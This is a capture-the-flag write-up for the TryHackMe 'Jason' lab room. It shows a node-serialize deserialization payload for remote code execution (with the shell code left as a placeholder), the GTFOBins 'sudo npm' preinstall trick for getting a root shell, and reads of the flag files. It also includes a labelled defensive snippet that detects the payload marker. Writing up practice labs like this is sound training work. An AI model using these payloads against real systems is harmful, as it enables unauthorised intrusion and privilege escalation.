Complete TryHackMe Jason Writeup

TryHackMe Jason

We are Horror LLC, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!

In JavaScript everything is a terrible mistake.

Thanks to @Luma for testing the room.

Scan the machine

rustscan -a 10.10.44.51

Investigate Web server

firefox http://10.10.44.51

Analyse Source Code

Investigate Requests

10.10.82.11

Get a reverse Shell

nodejs reverse shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}
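
The payload above works because `_$$ND_FUNC$$_` is the marker node-serialize uses to rebuild functions from strings, and the trailing `()` makes the rebuilt function run during deserialization. The following is an added example, not part of the original writeup or the room's code, showing how a server can screen such input with `JSON.parse` only; the base64 wrapping, the function names and the sample values are assumptions made for illustration.

```javascript
// Added example (not from the room or the original writeup): screen untrusted
// session data for node-serialize function markers before it reaches any
// deserializer. The base64 wrapping and field names are assumptions.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Walk a parsed JSON value and collect the paths of string values that carry
// the marker node-serialize uses to rebuild (and potentially run) functions.
function findFunctionMarkers(value, path = '$', hits = []) {
  if (typeof value === 'string') {
    if (value.includes(FUNC_MARKER)) hits.push(path);
  } else if (Array.isArray(value)) {
    value.forEach((item, i) => findFunctionMarkers(item, `${path}[${i}]`, hits));
  } else if (value !== null && typeof value === 'object') {
    for (const [key, item] of Object.entries(value)) {
      findFunctionMarkers(item, `${path}.${key}`, hits);
    }
  }
  return hits;
}

// Decode an untrusted value (raw JSON or base64-encoded JSON) using JSON.parse
// only, which yields plain data and never evaluates code.
function parseUntrustedSession(raw) {
  let text = String(raw).trim();
  if (!text.startsWith('{') && !text.startsWith('[')) {
    text = Buffer.from(text, 'base64').toString('utf8');
  }
  let data;
  try {
    data = JSON.parse(text);
  } catch (err) {
    return { ok: false, reason: 'not valid JSON', hits: [] };
  }
  const hits = findFunctionMarkers(data);
  if (hits.length > 0) {
    return { ok: false, reason: 'serialized function marker', hits };
  }
  return { ok: true, data, hits };
}

// Constructed samples: a benign value and the payload shape shown above,
// with the function body left as an inert placeholder.
const benign = Buffer.from(JSON.stringify({ email: 'user@example.com' })).toString('base64');
const hostile = '{"rce":"_$$ND_FUNC$$_function (){ /* placeholder */ }()"}';
console.log(parseUntrustedSession(benign));
console.log(parseUntrustedSession(hostile));
```

Logging the returned `hits` paths gives a detection signal for this payload shape even when the request is rejected.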

Get User Flag

cat /home/dylan/user.txt

Escalate Privileges

Search for npm on GTFOBins, which gives:

export TERM=xterm
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

Get Root Flag

cat /root/root.txt

Room THM Jason

NodeJs Shell Generator